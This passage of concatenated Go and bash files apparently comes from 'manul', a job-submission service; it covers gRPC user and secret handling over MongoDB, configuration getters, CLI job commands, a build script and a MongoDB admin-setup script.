session.HtmlBody("<h1>Some Content Here</h1><p>Hello</p>") spew.Dump(session) if e := session.Perform(); e != nil { log.Errorf("error: %v", e) } } c.Println("Sent....: ", c.Args) }, } e.Sh.AddCmd(cmd) } <file_sep>package shell import ( "gopkg.in/abiosoft/ishell.v2" "strings" ) func (e *Env) AddCmd(cmd *ishell.Cmd) { e.Sh.AddCmd(cmd) } func (e *Env) Run() { e.Sh.Run() } func (e *Env) Process(args ...string) { e.Sh.Process(args...) } // forward prints func (e *Env) Println(val ...interface{}) { e.Sh.Println(val...) } func (e *Env) Print(val ...interface{}) { e.Sh.Print(val...) } func (e *Env) Printf(format string, val ...interface{}) { e.Sh.Printf(format, val...) } func (e *Env) PushPrompt(str string) { e.prompts = append(e.prompts, str) e.Sh.SetPrompt(str) } func (e *Env) ConfirmRepl(c *ishell.Context, q string, or bool) bool { if or { e.PushPrompt("[Y/n] :") } else { e.PushPrompt("[y/N] :") } c.Println(q) defer e.PopPrompt() rtMsg := strings.TrimSpace(c.ReadLine()) if rtMsg == "n" || rtMsg == "N" { return false } else if rtMsg == "y" || rtMsg == "Y" { return true } else { return or } } func (e *Env) GetStringRepl(c *ishell.Context, q, prompt string) string { return e.GetStringReplFunc(c, q, prompt, func(s string) bool { return true }) } func (e *Env) GetStringReplNonEmpty(c *ishell.Context, q, prompt string) string { return e.GetStringReplFunc(c, q, prompt, func(s string) bool { return len(strings.TrimSpace(s)) > 0 }) } func (e *Env) GetStringReplFunc(c *ishell.Context, q, prompt string, f func(string) bool) string { if len(prompt) > 0 { e.PushPrompt(prompt) defer e.PopPrompt() } c.Println(q) var rtMsg string for rtMsg = c.ReadLine(); !(f(rtMsg)); rtMsg = c.ReadLine() { c.Println("Invalid Input") } return rtMsg } <file_sep>package helpers import ( "os" "path/filepath" ) func GetPathOfSelf() (dir string, err error) { dir, err = filepath.Abs(filepath.Dir(os.Args[0])) return } <file_sep>package model import ( "github.com/argcv/go-argcvapis/status/errcodes" "github.com/argcv/go-argcvapis/status/status" "github.com/golang/protobuf/ptypes/any" ) /* Status is a wrapper to pb-status */ type Status struct { Code errcodes.Code Message string Details []*any.Any } func (st *Status) ToPbStatus() (pbSt *status.Status) { pbSt = &status.Status{ Code: st.Code, Message: st.Message, Details: st.Details, } return } func FromPbStatus(st *status.Status) *Status { return &Status{ Code: st.Code, Message: st.Message, Details: st.Details, } } /* OrderType is an option type */ type OrderType int const ( OrderTypeUnset OrderType = iota OrderTypeAsc OrderTypeDesc ) <file_sep>#!/usr/bin/env bash mongo admin --eval 'db.createUser({ user: "manul", pwd: "<PASSWORD>", roles: [ { role: "userAdminAnyDatabase", db: "admin" }, "root","dbAdmin","dbOwner" ] });' echo "Created User manul" echo "db name: admin" echo "user: manul" echo "pass: <PASSWORD>" <file_sep>package service import ( "context" "fmt" pb "github.com/argcv/go-argcvapis/app/manul/secret" "github.com/argcv/manul/client/mongo" "github.com/argcv/manul/helpers" "github.com/argcv/manul/model" "github.com/argcv/webeh/log" "github.com/pkg/errors" "gopkg.in/mgo.v2/bson" ) type SecretServiceImpl struct { env *Env } func (s *SecretServiceImpl) listSecret(uid string, offset, size int) (sl []model.Secret, err error) { mc := s.env.SpawnMgoCli() defer mc.Close() q := bson.M{} sort := []string{"_id"} if ouid, err := mongo.SafeToObjectId(uid); err == nil { q["user_id"] = ouid } err = mc.Search(DbSecretColl, q, sort, offset, size, &sl) return } func (s *SecretServiceImpl) findSecret(uid string) (secret *model.Secret, err error) { mc := s.env.SpawnMgoCli() defer mc.Close() q := bson.M{} if ouid, e := mongo.SafeToObjectId(uid); e == nil { q["user_id"] = ouid } log.Infof("query: %v", q) err = mc.One(DbSecretColl, q, &secret) return } func (s *SecretServiceImpl) verifySecret(uid, secret string) bool { if ret, err := s.findSecret(uid); err != nil { log.Errorf("find secret failed!!: %v", err) return false } else { return ret.Secret == secret } } func (s *SecretServiceImpl) updateSecret(uid string) (ret *model.Secret, err error) { mc := s.env.SpawnMgoCli() defer mc.Close() q := bson.M{} ret = &model.Secret{} if ouid, e := mongo.SafeToObjectId(uid); e == nil { q["user_id"] = ouid ret.UserId = ouid } ret.Secret = helpers.RandomString(32, helpers.CharsetHex) ret.UpdateTime() err = mc.Upsert(DbSecretColl, q, ret) return } func (s *SecretServiceImpl) tryUpdateSecret(uid, secret, temp_token string) (ret *model.Secret, err error) { if ret, err := s.findSecret(uid); err != nil { return nil, errors.New(fmt.Sprintf("secret not found")) } else if ret.Secret == secret || ret.TempToken == temp_token { return s.updateSecret(uid) } else { return nil, errors.New(fmt.Sprintf("invalid script")) } } /* TODO:Not implemented yet */ func (s *SecretServiceImpl) UpdateSecret(context.Context, *pb.UpdateSecretRequest) (*pb.UpdateSecretResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (s *SecretServiceImpl) ForgotSecret(context.Context, *pb.ForgotSecretRequest) (*pb.ForgotSecretResponse, error) { return nil, errors.New("implement me") } <file_sep>package service import ( "fmt" pb "github.com/argcv/go-argcvapis/app/manul/user" "github.com/argcv/go-argcvapis/status/errcodes" "github.com/argcv/manul/client/mongo" "github.com/argcv/manul/model" "github.com/argcv/webeh/log" "github.com/pkg/errors" "golang.org/x/net/context" "google.golang.org/grpc/metadata" "gopkg.in/mgo.v2/bson" "strings" "time" ) type UserServiceImpl struct { env *Env } func (u *UserServiceImpl) findUserByName(name string) (user *model.User, err error) { mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{ "name": name, } err = mc.One(DbUserColl, q, &user) return } func (u *UserServiceImpl) findUserById(id string) (user *model.User, err error) { oid, err := mongo.SafeToObjectId(id) if err != nil { return nil, err } mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{ "_id": oid, } err = mc.One(DbUserColl, q, &user) return } func (u *UserServiceImpl) findUserByMixedId(q string) (user *model.User, err error) { if strings.HasPrefix(q, "$") && mongo.IsObjectIdHex(q[1:]) { return u.findUserById(q[1:]) } else { return u.findUserByName(q) } } func (u *UserServiceImpl) findUserByIdOrName(id, name string) (user *model.User, err error) { if mongo.IsObjectIdHex(id) { return u.findUserById(id) } else { return u.findUserByName(name) } } func (u *UserServiceImpl) authUser(id, name, secret string) (user *model.User, err error) { user = &model.User{} if id != "" { if user, err = u.findUserById(id); err != nil { log.Infof("find failed: %v", err) return } } else { if user, err = u.findUserByName(name); err != nil { log.Infof("find failed: %v", err) return } } if verify := u.env.SecretService.verifySecret(user.Id.Hex(), secret); verify { return } else { return nil, errors.New("invalid_secret") } } func (u *UserServiceImpl) ParseAuthInfo(ctx context.Context, auth *pb.AuthToken) (user *model.User, err error) { var id string var name string var secret string // try extract from auth first if auth != nil { id = auth.Id name = auth.Name secret = auth.Secret } // try extract from metadata (header Authorization) if md, ok := metadata.FromIncomingContext(ctx); ok { if authl := md.Get("authorization"); len(authl) > 0 { auth := authl[0] log.Infof("auth: %v", auth) kv := strings.Split(auth, ":") if len(kv) == 3 { id = kv[0] name = kv[1] secret = kv[2] } else { log.Warnf("Invalid Authorization Code: %v, skip...", auth) } } } else { log.Warnf("Get Metadata FAILED!!!") } return u.authUser(id, name, secret) } // List users by options func (u *UserServiceImpl) listUsers(option *model.UserServiceFilterOption, offset, size int) (ul []model.User, err error) { mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{} var sort []string if option != nil { if len(option.UserType) > 0 { q["user_type"] = mongo.InQuery(option.UserType) } if len(option.Name) > 0 { q["name"] = option.Name } if option.Order == model.OrderTypeAsc { // asc sort = []string{"_id"} } else if option.Order == model.OrderTypeDesc { // desc sort = []string{"-_id"} } } err = mc.Search(DbUserColl, q, sort, offset, size, &ul) return } func (u *UserServiceImpl) countUsers(option *model.UserServiceFilterOption) (count int, err error) { mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{} if option != nil { if len(option.UserType) > 0 { q["user_type"] = mongo.InQuery(option.UserType) } if len(option.Name) > 0 { q["name"] = option.Name } } return mc.Count(DbUserColl, q) } func (u *UserServiceImpl) ListUsers(ctx context.Context, req *pb.ListUsersRequest) (ret *pb.ListUsersResponse, e error) { if _, err := u.ParseAuthInfo(ctx, req.Auth); err != nil { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("invalid auth: %v", err.Error()), } ret = &pb.ListUsersResponse{ Success: false, Result: &pb.ListUsersResponse_Error{ Error: st.ToPbStatus(), }, } return } else { offset := req.Offset size := req.Size if offset < 0 { offset = 0 } if size == 0 { size = 10 } opt := model.ParseUserServiceFilterOption(req.Filter) ul, e1 := u.listUsers(opt, int(offset), int(size)) cnt, e2 := u.countUsers(opt) pbul := []*pb.User{} for _, cu := range ul { pbul = append(pbul, cu.ToPbUser()) } if e1 != nil || e2 != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: fmt.Sprintf("%v;%v", e1, e2), } ret = &pb.ListUsersResponse{ Success: false, Result: &pb.ListUsersResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.ListUsersResponse{ Success: true, Result: &pb.ListUsersResponse_Users{ Users: &pb.Users{ Users: pbul, Total: int32(cnt), Offset: offset, Size: size, }, }, } } return } } func (u *UserServiceImpl) createUser(name, displayName, email string, userType pb.UserType, createdBy string) (user *model.User, secret *model.Secret, err error) { mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{} q["name"] = name uid := mongo.NewObjectId() if mc.Exists(DbUserColl, q) { user = nil secret = nil err = errors.New(fmt.Sprintf("user_%s_was_created", name)) return } user = &model.User{ Id: uid, UserType: userType, Name: name, Email: email, CreateTime: time.Now(), UpdatedTime: time.Now(), CreatedBy: createdBy, } if err = mc.Insert(DbUserColl, user); err == nil { log.Infof("Created user %s by %s, creating secret...", name, createdBy) if secret, err = u.env.SecretService.updateSecret(uid.Hex()); err != nil { log.Errorf("Init secret failed...%v", err) return } else { log.Infof("Created secret for user %s", name) } } return } func (u *UserServiceImpl) CreateUser(ctx context.Context, req *pb.CreateUserRequest) (ret *pb.CreateUserResponse, e error) { if ucli, err := u.ParseAuthInfo(ctx, req.Auth); err != nil || ucli.UserType != model.UserType_ADMIN { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("%v", err), } ret = &pb.CreateUserResponse{ Success: false, Result: &pb.CreateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { if utar, _, err := u.createUser(req.Name, req.DisplayName, req.Email, req.UserType, ucli.Name); err != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: fmt.Sprintf("%v", err), } ret = &pb.CreateUserResponse{ Success: false, Result: &pb.CreateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.CreateUserResponse{ Success: true, Result: &pb.CreateUserResponse_User{ User: utar.ToPbUser(), }, } } return } } // check by id OR name // if the id is exists, it will skip name // assume user is valid func (u *UserServiceImpl) updateUser(id, name string, user *model.User) (err error) { if id == "" && name == "" { log.Infof("Both id and name are empty") return errors.New("bad_request") } mc := u.env.SpawnMgoCli() defer mc.Close() q := bson.M{} if id != "" && mongo.IsObjectIdHex(id) { q["_id"] = mongo.ToObjectIdHex(id) } else if name != "" { q["name"] = name } o := bson.M{} if user.Name != "" { o["name"] = user.Name } if user.DisplayName != "" { o["display_name"] = user.DisplayName } if user.Email != "" { o["email"] = user.Email } o["updated_time"] = time.Now() if !mc.Exists(DbUserColl, q) { user = nil err = errors.New(fmt.Sprintf("user_%s_not_exists", name)) return } return mc.Update(DbUserColl, q, mongo.SetOperator(o)) } func (u *UserServiceImpl) UpdateUser(ctx context.Context, req *pb.UpdateUserRequest) (ret *pb.UpdateUserResponse, e error) { retDenied := func(err error) (ret *pb.UpdateUserResponse, e error) { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("%v", err), } ret = &pb.UpdateUserResponse{ Success: false, Result: &pb.UpdateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } if ucli, err := u.ParseAuthInfo(ctx, req.Auth); err != nil { return retDenied(err) } else if (req.Id != ucli.Id.Hex() && req.Name != ucli.Name) && ucli.UserType != model.UserType_ADMIN { // if NOT self, And NOT admin return retDenied(err) } else if req.Update == nil || (req.Id == "" && req.Name == "") { errMsg := []string{} if req.Id == "" { errMsg = append(errMsg, "id is empty") } if req.Name == "" { errMsg = append(errMsg, "name is empty") } if req.Update == nil { errMsg = append(errMsg, "update body is empty") } st := model.Status{ Code: errcodes.Code_INVALID_ARGUMENT, Message: strings.Join(errMsg, ";"), } ret = &pb.UpdateUserResponse{ Success: false, Result: &pb.UpdateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { uup := &model.User{ DisplayName: req.Update.DisplayName, } updatedName := req.Name if ucli.UserType == model.UserType_ADMIN { uup.Email = req.Update.Email if req.Update.Name != "" { uup.Name = req.Update.Name updatedName = req.Update.Name } } if err := u.updateUser(req.Id, req.Name, uup); err != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: fmt.Sprintf("%v", err), } ret = &pb.UpdateUserResponse{ Success: false, Result: &pb.UpdateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { if utar, err := u.findUserByIdOrName(req.Id, updatedName); err != nil { st := model.Status{ Code: errcodes.Code_NOT_FOUND, Message: err.Error(), } ret = &pb.UpdateUserResponse{ Success: false, Result: &pb.UpdateUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.UpdateUserResponse{ Success: true, Result: &pb.UpdateUserResponse_User{ User: utar.ToPbUser(), }, } return } } return } } func (u *UserServiceImpl) GetUser(ctx context.Context, req *pb.GetUserRequest) (ret *pb.GetUserResponse, e error) { if ucli, err := u.ParseAuthInfo(ctx, req.Auth); err != nil { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("invalid auth: %v", err.Error()), } ret = &pb.GetUserResponse{ Success: false, Result: &pb.GetUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else if req.Id == "$" { ret = &pb.GetUserResponse{ Success: true, Result: &pb.GetUserResponse_User{ User: ucli.ToPbUser(), }, } return } else { if utar, err := u.findUserByIdOrName(req.Id, req.Name); err != nil { st := model.Status{ Code: errcodes.Code_NOT_FOUND, Message: err.Error(), } ret = &pb.GetUserResponse{ Success: false, Result: &pb.GetUserResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.GetUserResponse{ Success: true, Result: &pb.GetUserResponse_User{ User: utar.ToPbUser(), }, } return } } } /* TODO:Not implemented yet */ func (u *UserServiceImpl) DeleteUser(context.Context, *pb.DeleteUserRequest) (*pb.DeleteUserResponse, error) { return nil, errors.New("implement me") } <file_sep>package config import ( "github.com/argcv/manul/client/mongo" "time" ) func GetDBMongoAddrs() []string { defaultAddrs := []string{"localhost:27017"} addrs := getStringSliceOrDefault(KeyDBMongoAddrs, defaultAddrs) if len(addrs) == 0 { addrs = defaultAddrs } return addrs } func GetDBMongoAuth() *mongo.Auth { if getBoolOrDefault(KeyDBMongoPerformAuth, false) { // with auth source := getStringOrDefault(KeyDBMongoAuthDatabase, "") user := getStringOrDefault(KeyDBMongoAuthUser, "admin") pass := getStringOrDefault(KeyDBMongoAuthPass, "") mech := getStringOrDefault(KeyDBMongoAuthMechanism, "") return &mongo.Auth{ Source: source, Username: user, Password: <PASSWORD>, Mechanism: mech, } } return nil } func GetDBMongoTimeout() time.Duration { dur := time.Duration(getInt64OrDefault(KeyDBMongoTimeoutSec, 0)) return dur * time.Second } func InitMongoClient() (client *mongo.Client, err error) { addrs := GetDBMongoAddrs() auth := GetDBMongoAuth() db := getStringOrDefault(KeyDBMongoDatabase, "") if db == "" && auth != nil { db = auth.Source } timeout := GetDBMongoTimeout() return mongo.NewMongoClient(addrs, db, timeout, auth) } <file_sep>package shell <file_sep>package model import ( pb "github.com/argcv/go-argcvapis/app/manul/project" "github.com/argcv/manul/helpers" "github.com/argcv/webeh/log" "github.com/davecgh/go-spew/spew" "gopkg.in/yaml.v2" "io/ioutil" ) var ( ProjectConfigDefaultStages = []string{ "install", "build", "test", } ) type ProjectJobConfig struct { Script string `bson:"script,omitempty" json:"script" yaml:"script"` Scripts []string `bson:"scripts,omitempty" json:"scripts" yaml:"scripts"` } type ProjectChecklistElem struct { Path string `bson:"path,omitempty" json:"path" yaml:"check_list"` TargetType int `bson:"target_type,omitempty" json:"target_type" yaml:"target_type"` } type ProjectConfig struct { Image string `bson:"image,omitempty" json:"image" yaml:"image"` Env []string `bson:"env,omitempty" json:"env" yaml:"env"` Volume []string `bson:"volume,omitempty" json:"volume" yaml:"volume"` Stages []string `bson:"stage,omitempty" json:"stage" yaml:"stage"` Jobs map[string]ProjectJobConfig `bson:"job,omitempty" json:"job" yaml:"job"` Checklist []*pb.ProjectChecklistElem `bson:"check_list,omitempty" json:"check_list" yaml:"check_list"` TimeoutSec uint64 `bson:"timeout_sec,omitempty" json:"timeout_sec" yaml:"timeout_sec"` MaximumCpu uint64 `bson:"maximum_cpu,omitempty" json:"maximum_cpu" yaml:"maximum_cpu"` MaximumMemMb uint64 `bson:"maximum_mem_mb,omitempty" json:"maximum_mem_mb" yaml:"maximum_mem_mb"` } func LoadProjectConfig(path string) (*ProjectConfig, error) { if data, err := ioutil.ReadFile(path); err != nil { return nil, err } else { cfg := &ProjectConfig{} err = yaml.Unmarshal([]byte(data), cfg) if err != nil { return nil, err } else { return cfg, err } } } func (c *ProjectConfig) ToBashScriptsExecutor() *helpers.BashScriptsExecutor { e := helpers.NewBashScriptsExecutor("", c.Env...) log.Infof("dump: [%v]", spew.Sdump(c)) if len(c.Stages) == 0 { c.Stages = ProjectConfigDefaultStages } for _, stage := range c.Stages { if job, ok := c.Jobs[stage]; ok { scripts := []string{} if len(job.Script) > 0 { scripts = append(scripts, job.Script) } scripts = append(scripts, job.Scripts...) e.AddScriptsInStage(stage, scripts...) } else { log.Infof("Stage: %v NOT found...", stage) e.AddScriptsInStage(stage) } } return e } func (c *ProjectConfig) ToPbProjectConfig(rich bool) (pbConfig *pb.ProjectConfig) { pbConfig = &pb.ProjectConfig{ Image: c.Image, Checklist: c.Checklist, TimeoutSec: c.TimeoutSec, MaximumCpu: c.MaximumCpu, MaximumMemMb: c.MaximumMemMb, } return } <file_sep>package client import ( "github.com/argcv/go-argcvapis/app/manul/file" "github.com/argcv/go-argcvapis/app/manul/job" "github.com/argcv/manul/client/workdir" "github.com/argcv/manul/config" "github.com/argcv/webeh/log" "github.com/davecgh/go-spew/spew" "github.com/spf13/cobra" "golang.org/x/net/context" "os" "path" "time" ) func NewManulJobSubmitCommand() *cobra.Command { cmd := &cobra.Command{ Use: "submit", Short: "Job submitting", RunE: func(cmd *cobra.Command, args []string) (err error) { conn := NewGrpcConn() defer conn.Close() jcli := conn.NewJobCli() ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) defer cancel() auth := config.GetAuthInfo() files := &file.Files{} dir, _ := cmd.Flags().GetString("dir") dir = path.Clean(dir) pid, _ := cmd.Flags().GetString("project") base, _ := os.Getwd() if dir[0] != '/' { // relative path dir = path.Join(base, dir) } fs := workdir.NewWorkdir(dir) _, lastDir := fs.Split() name, _ := cmd.Flags().GetString("name") if name == "" { name = lastDir } log.Infof("user: %v", auth.Name) log.Infof("name: %v", name) log.Infof("base: %v", fs.GetCwd()) fs.IterFiles("/", func(f *file.File) error { log.Infof("file: [%v], [%v]", f.Path, f.Name) files.Data = append(files.Data, f) return nil }) req := &job.CreateJobRequest{ Auth: auth, ProjectId: pid, Files: files, } if ret, err := jcli.CreateJob(ctx, req); err != nil { log.Infof("Error: %v", err) } else { log.Infof("Dump: %v", spew.Sdump(ret)) } return }, } cmd.PersistentFlags().String("project", "p", "project id") cmd.PersistentFlags().StringP("dir", "d", ".", "job base dir") return cmd } func NewManulJobCheckCommand() *cobra.Command { cmd := &cobra.Command{ Use: "check", Short: "Job Check", RunE: func(cmd *cobra.Command, args []string) (err error) { conn := NewGrpcConn() defer conn.Close() ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) defer cancel() jcli := conn.NewJobCli() auth := config.GetAuthInfo() for _, jid := range args { req := &job.GetJobRequest{ Auth: auth, Id: jid, } if ret, err := jcli.GetJob(ctx, req); err != nil { log.Infof("Error: %v", err) } else { log.Infof("Dump: %v", spew.Sdump(ret)) log.Infof("success: %v", ret.Success) log.Infof("msg: %v", ret.Message) if ret.Success { log.Infof(ret.GetJob().Logs) } } } return }, } return cmd } func NewManulJobCommand() *cobra.Command { cmd := &cobra.Command{ Use: "job", Short: "Job Operations", PreRunE: func(cmd *cobra.Command, args []string) (err error) { return }, } cmd.AddCommand( NewManulJobSubmitCommand(), NewManulJobCheckCommand(), ) return cmd } <file_sep>#!/usr/bin/env bash # env TEST_MODE=true ./build.sh TEST_MODE=${TEST_MODE:-false} # Exit Once failed set -Eeuxo pipefail if [ "$TEST_MODE" = true ]; then pushd log go test -v popd # log fi # WITH_TEST go get ./cmd/... echo "Build Release" PLATFORM="$(uname -s | tr 'A-Z' 'a-z')" #function is_linux() { # [[ "${PLATFORM}" == "linux" ]] #} #function is_macos() { # [[ "${PLATFORM}" == "darwin" ]] #} export CGO_ENABLED=0 #GOOS=linux export GOOS=${PLATFORM} export BUILD_DATE=$(date '+%Y%m%d%H%M%S%Z') export BUILD_LDFLAGS="-X github.com/argcv/manul/version.GitHash=$(git rev-parse HEAD | cut -c1-8) " export BUILD_LDFLAGS="${BUILD_LDFLAGS} -X github.com/argcv/manul/version.BuildDate=\"${BUILD_DATE}\" " export BUILD_LDFLAGS="${BUILD_LDFLAGS} \"-extldflags='-static'\"" go build -a -ldflags="$BUILD_LDFLAGS" ./cmd/manul # Not in use: entrypoint #env GOOS=linux go build -a -ldflags="$BUILD_LDFLAGS" ./cmd/manul-entrypoint # #if [[ "${GOOS}" != 'linux' ]]; then # go build -o manul-entrypoint-$GOOS -a -ldflags="$BUILD_LDFLAGS" ./cmd/manul-entrypoint #fi<file_sep>package config func GetRpcBind() string { return getStringOrDefault(KeyRpcBind, "0.0.0.0") } func GetRpcHost() string { return getStringOrDefault(KeyRpcHost, "127.0.0.1") } func GetRpcPort() int { return getIntOrDefault(KeyRpcPort, 35000) } func GetRpcOptionMaxRecvMsgSizeMB() int { // 64MB in default return getIntOrDefault(KeyRpcOptionMaxRecvMsgSizeMB, 64) } func GetRpcOptionMaxSendMsgSizeMB() int { // 64MB in default return getIntOrDefault(KeyRpcOptionMaxSendMsgSizeMB, 64) } func GetRpcOptionMaxRecvMsgSize() int { // 64MB in default return GetRpcOptionMaxRecvMsgSizeMB() * 1024 * 1024 } func GetRpcOptionMaxSendMsgSize() int { // 64MB in default return GetRpcOptionMaxSendMsgSizeMB() * 1024 * 1024 } func GetHttpBind() string { return getStringOrDefault(KeyHttpBind, "0.0.0.0") } func GetHttpHost() string { return getStringOrDefault(KeyHttpHost, "127.0.0.1") } func GetHttpPort() int { return getIntOrDefault(KeyHttpPort, 35100) } <file_sep>package service import ( "context" "fmt" pbUser "github.com/argcv/go-argcvapis/app/manul/user" "github.com/argcv/manul/client/mongo" "github.com/argcv/manul/client/workdir" "github.com/argcv/manul/config" "github.com/argcv/manul/model" "github.com/argcv/webeh/log" "github.com/pkg/errors" ) type Env struct { UserService *UserServiceImpl SecretService *SecretServiceImpl ProjectService *ProjectServiceImpl JobService *JobServiceImpl // Client mc *mongo.Client fs *workdir.Workdir } const ( DbUserColl = "user" DbSecretColl = "secret" DbProjectColl = "project" DbJobColl = "job" FsProjectDir = "project" FsJobDir = "job" ) const ( SysAssertAdmin = "_root" ) func (env *Env) SpawnMgoCli() *mongo.Client { return env.mc.Spawn() } func (env *Env) SpawnWorkdir() *workdir.Workdir { return env.fs.Spawn() } func (env *Env) SpawnProjectWorkdir() *workdir.Workdir { return env.SpawnWorkdir().Goto(FsProjectDir).Rebase() } func (env *Env) SpawnJobWorkdir() *workdir.Workdir { return env.SpawnWorkdir().Goto(FsJobDir).Rebase() } func (env *Env) ParseAuthInfo(ctx context.Context, auth *pbUser.AuthToken) (user *model.User, err error) { return env.UserService.ParseAuthInfo(ctx, auth) } func (env *Env) DatabaseSetup() (err error) { log.Infof("Check Database Environment...") admin := SysAssertAdmin uopt := model.ParseUserServiceFilterOption(fmt.Sprintf("n:%s", admin)) if ul, err := env.UserService.listUsers(uopt, 0, 100); err != nil { log.Errorf("Find users failed in querying...") return err } else { if len(ul) == 0 { log.Infof("admin NOT found... creating users...") if user, secret, err := env.UserService.createUser( admin, "System Admin", "<EMAIL>", model.UserType_ADMIN, admin); err != nil { log.Errorf("create user failed: %v", err) return err } else { config.SetClientUserName(user.Name) config.SetClientUserSecret(secret.Secret) log.Infof("Created user: %s, %sxxxx", user.Name, secret.Secret[:1]) } } else if len(ul) > 1 { errMsg := fmt.Sprintf("found more than 1 admin (%v)?", len(ul)) log.Error(errMsg) err = errors.New(errMsg) return err } else { // only 1 user log.Infof("Admin user %s was created, id: %v", ul[0].Name, ul[0].Id) } } return } func (env *Env) init() error { // user service env.UserService = &UserServiceImpl{ env: env, } env.SecretService = &SecretServiceImpl{ env: env, } // job env.JobService = &JobServiceImpl{ env: env, } // project service env.ProjectService = NewProjectServiceImpl(env) // init client if mc, err := config.InitMongoClient(); err != nil { log.Fatalf("Init Mongo Failed: %v", err.Error()) return err } else { env.mc = mc } log.Infof("Check MongoDB Connection....") { mc := env.SpawnMgoCli() defer mc.Close() if err := mc.Session.Ping(); err != nil { log.Errorf("Mongo Session initialize failed") return err } else { log.Infof("MongoDB Session is initialized") } } env.DatabaseSetup() // fs env.fs = workdir.NewWorkdir(config.GetFsWorkdir()) log.Infof("Base dir: %v", env.fs.Base) return nil } func NewManulGlobalEnv() (env *Env, err error) { env = &Env{} if err = env.init(); err != nil { log.Fatalf("Server Init Failed!!! %s", err.Error()) } return } <file_sep>package model import ( pb "github.com/argcv/go-argcvapis/app/manul/user" "github.com/argcv/manul/client/mongo" "gopkg.in/mgo.v2/bson" "strings" "time" ) type UserType pb.UserType const ( // could access everything // used to add/remove users // to/from projects UserType_ADMIN = pb.UserType_ADMIN // used to submit job // for ordinary students UserType_USER = pb.UserType_USER // special authorization // could read project // but can NOT submit job UserType_BOT = pb.UserType_BOT ) type UserServiceFilterOption struct { UserType []pb.UserType Order OrderType // 0: ignore, 1: asc, 2: desc Name string // user name Query string } func ParseUserServiceFilterOption(filter string) (opt *UserServiceFilterOption) { opt = &UserServiceFilterOption{} tags := strings.Split(filter, "|") for _, tag := range tags { if strings.HasPrefix(tag, "t:") { // user type ut := tag[2:] if ut == "admin" { opt.UserType = append(opt.UserType, pb.UserType_ADMIN) } else if ut == "bot" { opt.UserType = append(opt.UserType, pb.UserType_BOT) } else if ut == "user" { opt.UserType = append(opt.UserType, pb.UserType_USER) } } else if strings.HasPrefix(tag, "o:") { // order ot := tag[2:] if ot == "asc" { opt.Order = OrderTypeAsc } else if ot == "desc" { opt.Order = OrderTypeDesc } } else if strings.HasPrefix(tag, "n:") { opt.Name = tag[2:] } else if strings.HasPrefix(tag, "q:") { opt.Query = tag[2:] } } return } type User struct { Id bson.ObjectId `bson:"_id,omitempty" json:"id"` UserType pb.UserType `bson:"user_type,omitempty" json:"user_type,omitempty"` Name string `bson:"name,omitempty" json:"name,omitempty"` DisplayName string `bson:"display_name,omitempty" json:"display_name,omitempty"` Email string `bson:"email,omitempty" json:"email,omitempty"` CreateTime time.Time `bson:"create_time,omitempty" json:"create_time,omitempty"` UpdatedTime time.Time `bson:"updated_time,omitempty" json:"updated_time,omitempty"` CreatedBy string `bson:"created_by,omitempty" json:"created_by"` } func (u *User) UpdateTime() *User { if u.CreateTime == time.Unix(0, 0) { u.CreateTime = time.Now() } u.UpdatedTime = time.Now() return u } // from pb & to pb func (u *User) ToPbUser() (pbUser *pb.User) { pbUser = &pb.User{ Id: u.Id.Hex(), UserType: u.UserType, Name: u.Name, DisplayName: u.DisplayName, Email: u.Email, } return } func FromPbUser(u *pb.User) *User { return &User{ Id: mongo.SafeToObjectIdOrEmpty(u.Id), UserType: u.UserType, Name: u.Name, DisplayName: u.DisplayName, Email: u.Email, } } <file_sep>/* * The MIT License (MIT) * * Copyright (c) 2018 <NAME> <<EMAIL>> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. * */ package helpers import ( "fmt" "reflect" st "github.com/golang/protobuf/ptypes/struct" ) // ToStruct converts a map[string]interface{} to a ptypes.Struct func ToStruct(v map[string]interface{}) *st.Struct { size := len(v) if size == 0 { return nil } fields := make(map[string]*st.Value, size) for k, v := range v { fields[k] = ToValue(v) } return &st.Struct{ Fields: fields, } } // ToValue converts an interface{} to a ptypes.Value func ToValue(v interface{}) *st.Value { switch v := v.(type) { case nil: return nil case bool: return &st.Value{ Kind: &st.Value_BoolValue{ BoolValue: v, }, } case int: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), 